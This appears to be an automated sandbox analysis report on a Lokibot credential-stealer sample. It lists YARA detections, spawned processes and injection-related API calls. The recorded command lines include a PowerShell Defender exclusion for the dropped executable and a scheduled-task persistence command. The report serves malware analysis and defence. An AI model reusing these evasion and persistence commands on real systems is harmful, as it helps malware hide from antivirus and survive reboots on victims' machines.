Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:16:47
Start date:	17/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
Imagebase:	0xf90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:16:47
Start date:	17/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:16:47
Start date:	17/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"
Imagebase:	0xe50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:16:47
Start date:	17/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:16:48
Start date:	17/04/2024
Path:	C:\Users\user\Desktop\gunzipped.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\gunzipped.exe"
Imagebase:	0xa0000
File size:	553'984 bytes
MD5 hash:	8864B52D242037414B7C4A230C390AB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:16:48
Start date:	17/04/2024
Path:	C:\Users\user\Desktop\gunzipped.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gunzipped.exe"
Imagebase:	0x9e0000
File size:	553'984 bytes
MD5 hash:	8864B52D242037414B7C4A230C390AB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:16:49
Start date:	17/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:16:49
Start date:	17/04/2024
Path:	C:\Users\user\AppData\Roaming\WiHDtnb.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\WiHDtnb.exe
Imagebase:	0x830000
File size:	553'984 bytes
MD5 hash:	8864B52D242037414B7C4A230C390AB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 18%, ReversingLabs Detection: 34%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:16:50
Start date:	17/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"
Imagebase:	0xe50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:16:50
Start date:	17/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:16:50
Start date:	17/04/2024
Path:	C:\Users\user\AppData\Roaming\WiHDtnb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\WiHDtnb.exe"
Imagebase:	0x570000
File size:	553'984 bytes
MD5 hash:	8864B52D242037414B7C4A230C390AB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	111
Total number of Limit Nodes:	6

Executed Functions

Function 052FC748 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42d28e4834cd5e643e465a5987048f1af1a940c94ef46f788c901cfec8f41382
Instruction ID: a7c7fabfbc16ba2b72535056e151fb463d972338426bad4c257a720cbd078fb0
Opcode Fuzzy Hash: 42d28e4834cd5e643e465a5987048f1af1a940c94ef46f788c901cfec8f41382
Instruction Fuzzy Hash: D8229C31B192098FDB19DB68D554BAEB7F6BF89704F144469E60AEB3A0CB34ED01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 052FAC9B Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 861ee8a39f1f15c9920273848bfafb160d6e2ba1c9c061815b4722b7334400d3
Instruction ID: 8702a5036382d6698ef6beca07cea7c92051cb0c0b61a6506806cb87c6fa21ff
Opcode Fuzzy Hash: 861ee8a39f1f15c9920273848bfafb160d6e2ba1c9c061815b4722b7334400d3
Instruction Fuzzy Hash: B4A00214FBE00CD095109D10B0155F5C17F4E1B210F543135471E3341206D4D012034C

Uniqueness

Uniqueness Score: -1.00%

Function 052F772E Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 052F796E

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3c490ddc7a839c76bb2d81b51fc16f8c787af896a2dbf0e9763f788156cce9cd
Instruction ID: 43a51bfae9f367d0d7bcd05984b83a7ab92281a1349180ef4c7e4e2b5ab1e782
Opcode Fuzzy Hash: 3c490ddc7a839c76bb2d81b51fc16f8c787af896a2dbf0e9763f788156cce9cd
Instruction Fuzzy Hash: 79915971D1021A9FDB10CF68D880BEDFBB2FF48314F1885AAD909A7250DB75A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 052F7738 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 052F796E

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e5b91de2ff0f8b50e3ada8100f48b202a9e4c2f4f023d79cc53a65c2715e1a8e
Instruction ID: 8c5bf069199f0e6c007791ef3b4087fc608a6c19af681282808c1c892ecdcddf
Opcode Fuzzy Hash: e5b91de2ff0f8b50e3ada8100f48b202a9e4c2f4f023d79cc53a65c2715e1a8e
Instruction Fuzzy Hash: 3B916A71D1021A8FDB10CF68D840BEDFBB2FF48314F1885AAD909A7250DB75A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02514864 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02515D79

Memory Dump Source

Source File: 00000000.00000002.1993490409.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_gunzipped.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dc29bd8cec0b825dd65e4a0d1b630b9ab87c0d64d4e8e4dea8fa159f202cebcf
Instruction ID: c4cb02ab818cc71a3cf6f98dac0324f2bc897c8c63a159d4e768c3b8bcd6e081
Opcode Fuzzy Hash: dc29bd8cec0b825dd65e4a0d1b630b9ab87c0d64d4e8e4dea8fa159f202cebcf
Instruction Fuzzy Hash: 5641F2B0C00719CBEB24DFA9C844BDEBBB5BF48304F20806AD418AB254DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02515CBC Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02515D79

Memory Dump Source

Source File: 00000000.00000002.1993490409.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_gunzipped.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 98d4eafd50e73b994437a9477b1ed1951cecfbde4870a881164083bdd4afd9dc
Instruction ID: 7388a7169c58108997a5c2831c17626db356884323e41c3a82b1dc623a3699a7
Opcode Fuzzy Hash: 98d4eafd50e73b994437a9477b1ed1951cecfbde4870a881164083bdd4afd9dc
Instruction Fuzzy Hash: A741F2B0C00B19CFEB24DFA9C8847DDBBB5BF48304F20806AD419AB254DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02515E34 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1993490409.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_gunzipped.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da20d07295e5ca0a7819e87919a57c441b33e0cb47144db58d588e9b943c8e1b
Instruction ID: bfb242fe1a0a9c0004e2fc85ce840a0241e58c9dcfa9747060d938eab0a4b83c
Opcode Fuzzy Hash: da20d07295e5ca0a7819e87919a57c441b33e0cb47144db58d588e9b943c8e1b
Instruction Fuzzy Hash: F131EFB0805649CFEB15CFA8C4887EDBFB0BF86308F94418AC055AB265E779990ACF55

Uniqueness

Uniqueness Score: -1.00%

Function 052F74A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 052F7540

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0319a0b867235a65cba17ed62eff48ac575a152485c0d19f74b9a5dc437b03ad
Instruction ID: 302abdaa227e80b75b7d0ec5e28334e3046d34d153b1dde50c81bcd43fef1f66
Opcode Fuzzy Hash: 0319a0b867235a65cba17ed62eff48ac575a152485c0d19f74b9a5dc437b03ad
Instruction Fuzzy Hash: D72127B5D003599FCB10DFA9C985BEEBBF5FF48310F14842AEA59A7240D7789544CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F74B0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 052F7540

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 248a0961f8352528c6fc796e86f29f234214fa435f286e014e6e1f7d560fb6f0
Instruction ID: 36abfe010003e1dccb19299d3e5fde9752dae7917e2ba8f8b088cfaf119bf60b
Opcode Fuzzy Hash: 248a0961f8352528c6fc796e86f29f234214fa435f286e014e6e1f7d560fb6f0
Instruction Fuzzy Hash: 382139B19003599FCB10DFA9C885BEEFBF5FF48310F148429EA19A7240C7789944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 052F75A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 052F7620

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 33cde09d66592c846cba9b94fcdc34a0868ef31316cb71368e4015b023bf5f68
Instruction ID: 6b60245a9a3ea9a58105c165057a2daf408d3e33879063a002678402fe0bd4ab
Opcode Fuzzy Hash: 33cde09d66592c846cba9b94fcdc34a0868ef31316cb71368e4015b023bf5f68
Instruction Fuzzy Hash: 612138B1C003499FCB10DFAAC880AEEFBF5FF48310F10842AE519A7240C7789940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F7318 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 052F7396

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6849418cb482ce31fc009ded36a38e08ff81910169a3ec1fd96865c59dc7a684
Instruction ID: af782a4cb0f5cb16e9b47779f06149419b063cbbe20d0c55481f1d8e2e0f3513
Opcode Fuzzy Hash: 6849418cb482ce31fc009ded36a38e08ff81910169a3ec1fd96865c59dc7a684
Instruction Fuzzy Hash: F32137B19002099FDB14DFAAC4857EEFBF5FF48314F148429D959A7240CB789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F7310 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 052F7396

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b021c797f4353537bc69d9c3bc22c661239689048f694941645f3d771a3155bd
Instruction ID: b44d86d961a0defd002a3c8954a9b8a9234677976c75ade3b0d2267c995c2c6a
Opcode Fuzzy Hash: b021c797f4353537bc69d9c3bc22c661239689048f694941645f3d771a3155bd
Instruction Fuzzy Hash: 7F2154B1D002098FDB14DFAAC9857EEBBF4FF48310F14842AD959A7240DB789945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F759A Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 052F7620

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8e2b6b69f5274b315a4cd0ac3a134be67f5085859b50275a72d37ecf18c6858a
Instruction ID: 6fb706575dfd1a80746e120e994bbffab615577fea8307d84aa71fb1eb8ddb03
Opcode Fuzzy Hash: 8e2b6b69f5274b315a4cd0ac3a134be67f5085859b50275a72d37ecf18c6858a
Instruction Fuzzy Hash: 232137B1C003099FCB10DFA9C981AEEFBF5FF48310F14842AE519A7240D7389941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F73E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 052F745E

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d4585ce9582686d87ef9df7dd9949da8a129c8d820d9b24cdc821c5776d15905
Instruction ID: 4b7cfa6d66d4d8d8ca3dfe17a7af5e5daddac4e72cbd5504f6857416e6f5d539
Opcode Fuzzy Hash: d4585ce9582686d87ef9df7dd9949da8a129c8d820d9b24cdc821c5776d15905
Instruction Fuzzy Hash: 3E1156B68002498FCB10DFA9C945AEEFFF5FF48314F14881AE55AA7250C7399541CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F73F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 052F745E

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 69d01b3ed39700e7ee5d1a3e7429080809f35ac08cae43c723b6a196ef0a9d87
Instruction ID: 87ec84e1eda3a61f8667143338bed5f34e9fdcdfc51f37d13fc99ad64429ef05
Opcode Fuzzy Hash: 69d01b3ed39700e7ee5d1a3e7429080809f35ac08cae43c723b6a196ef0a9d87
Instruction Fuzzy Hash: B71137718002499FCB10DFAAC844AEEFFF5FF48314F148419E519A7250C779A544CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F6E2A Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 052F6E92

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c89eb9b9c5174e9cdaccc80da86562c3948066f118017f03d43f9b7604b17655
Instruction ID: 7d15983f6412f2870f24082b2fb5ab7045f57072bd854adcb655da5156120824
Opcode Fuzzy Hash: c89eb9b9c5174e9cdaccc80da86562c3948066f118017f03d43f9b7604b17655
Instruction Fuzzy Hash: A41128B5D002498FCB20DFAAC4457EEFFF5EF88314F248819D559A7240CB79A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 052F6E30 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 052F6E92

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0d55fad24a832e30581897be321a1c7100f2f0fff4c9609d5b82a41e4cf16de1
Instruction ID: d8e4a908db64ed308004504cf6848f58ea03757b8dfffcecd7c379dbb7cd84ab
Opcode Fuzzy Hash: 0d55fad24a832e30581897be321a1c7100f2f0fff4c9609d5b82a41e4cf16de1
Instruction Fuzzy Hash: CE113AB1D002498FCB10DFAAC445BEFFBF5EF88314F208419D519A7240CB79A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 052F9948 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 052FBC25

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 56c831a4bea82dfeefce2c3c544c5df559267dbbde6ffa1775e1e61cf42f00a5
Instruction ID: 4d28eecf8483f4d78eeb76ddf971e08711fd61af3a97bed4906d82e001fd9d0b
Opcode Fuzzy Hash: 56c831a4bea82dfeefce2c3c544c5df559267dbbde6ffa1775e1e61cf42f00a5
Instruction Fuzzy Hash: DC11F5B58003499FDB10DF9AD984BEEFBF8FB48314F148419E659A7200C379A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 052FBBC1 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 052FBC25

Memory Dump Source

Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1b79b62ab4b951d7d6f2325a52805b2959388265646e992ee148cf93a0adc778
Instruction ID: a83e1c8e72e8cec91d1e3586894eadcb7526818b86e38f44520983b000b5c12b
Opcode Fuzzy Hash: 1b79b62ab4b951d7d6f2325a52805b2959388265646e992ee148cf93a0adc778
Instruction Fuzzy Hash: 751103B68002498FCB10DF99D585BEEFBF8FB08314F14881AD558A3200C378A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0097D034 Relevance: .1, Instructions: 85COMMON

